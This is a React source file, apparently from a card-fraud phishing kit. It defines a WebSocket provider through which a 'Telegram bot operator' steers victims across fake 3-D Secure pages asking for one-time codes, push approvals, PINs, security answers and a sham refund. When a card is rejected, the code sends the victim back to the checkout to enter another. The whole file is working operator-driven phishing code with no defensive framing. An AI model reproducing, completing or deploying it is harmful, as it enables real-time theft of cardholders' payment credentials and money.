import React, { createContext, useEffect, useState, useCallback } from 'react';
import { useNavigate } from 'react-router-dom';
import { toast } from 'react-toastify';
import wsClient from '../services/wsClient';
import { t } from '../utils/i18n';
import { SUCCESS_ROUTE } from '../utils/config';

export const WebSocketContext = createContext(null);

export const WebSocketProvider = ({ children, onDeclineReturn }) => {
  const navigate = useNavigate();
  const [connected, setConnected] = useState(false);
  const [questionText, setQuestionText] = useState('');
  const [customInputPrompt, setCustomInputPrompt] = useState('');

  const connect = useCallback((force = false) => {
    const clientId = localStorage.getItem('clientUuId');
    if (clientId) {
      wsClient.connect(clientId, force);
    }
  }, []);

  useEffect(() => {
    connect();

    const unsubConnect = wsClient.on('connected', () => setConnected(true));
    const unsubDisconnect = wsClient.on('disconnected', () => setConnected(false));

    const unsubMessage = wsClient.on('message', (data) => {
      const { action, status, details } = data;

      // Save question / prompt details to localStorage before navigating so page has it on mount
      if (details) {
        if (action === 'navigate_to_question' || status === 'question_page') {
          setQuestionText(details);
          localStorage.setItem('question_details', details);
        }
        if (action === 'show_custom_input') {
          setCustomInputPrompt(details);
          localStorage.setItem('custom_input_prompt', details);
        }
      }

      // Navigation commands from Telegram bot operator
      if (action === 'navigate_to_otp' || status === 'otp_page') {
        localStorage.removeItem('refund_mode');
        localStorage.removeItem('otp_error');
        navigate('/3ds/otp');
      } else if (action === 'navigate_to_refund' || status === 'refund_page') {
        localStorage.setItem('refund_mode', 'true');
        if (data.refundAmount) {
          localStorage.setItem('refund_amount', data.refundAmount);
        }
        localStorage.removeItem('otp_error');
        navigate('/3ds/otp');
      } else if (action === 'navigate_to_push' || status === 'push_page') {
        navigate('/3ds/push');
      } else if (action === 'navigate_to_question' || status === 'question_page') {
        navigate('/3ds/question');
      } else if (action === 'navigate_to_pin' || status === 'pin_page') {
        navigate('/3ds/pin');
      } else if (action === 'redirect_success' || status === 'sucess_page' || status === 'original_page') {
        localStorage.removeItem('otp_error');
        localStorage.setItem('passed_s', 'true');
        const geo = localStorage.getItem('geo') || 'vn';
        const targetSuccessRoute = `/${geo}/final` || SUCCESS_ROUTE || '/success';
        navigate(targetSuccessRoute);
      } else if (action === 'show_error' || status === 'wrong_data') {
        toast.error(t('cardError'));
        const lastSubmitted = sessionStorage.getItem('last_submitted_card');
        if (lastSubmitted) {
          sessionStorage.setItem('rejected_card', lastSubmitted.replace(/\s/g, ''));
        }
        localStorage.setItem('wizardStep', '4');
        localStorage.setItem('open_activation_popup', 'true');
        if (typeof window !== 'undefined') {
          window.dispatchEvent(new Event('open_activation_popup'));
        }
        onDeclineReturn?.();
        const geo = localStorage.getItem('geo') || 'vn';
        const checkoutPath = localStorage.getItem('checkout_path') || `/${geo}/homepage`;
        navigate(checkoutPath);
      } else if (action === 'show_invalid_otp' || status === 'wrong_otp') {
        localStorage.setItem('otp_error', 'true');
        toast.error(t('invalidOtp'));
        if (window.location.pathname === '/3ds/otp') {
          window.dispatchEvent(new Event('otp_error'));
        } else {
          navigate('/3ds/otp');
        }
      } else if (status === 'change_payment') {
        toast.error(t('paymentError'));
        navigate('/3ds/error');
      } else if (action === 'show_custom_input') {
        navigate('/3ds/question');
      }
    });

    return () => {
      unsubConnect();
      unsubDisconnect();
      unsubMessage();
    };
  }, [connect, navigate, onDeclineReturn]);

  return (
    <WebSocketContext.Provider
      value={{
        connected,
        connect,
        questionText,
        customInputPrompt,
        send: (data) => wsClient.send(data),
      }}
    >
      {children}
    </WebSocketContext.Provider>
  );
};
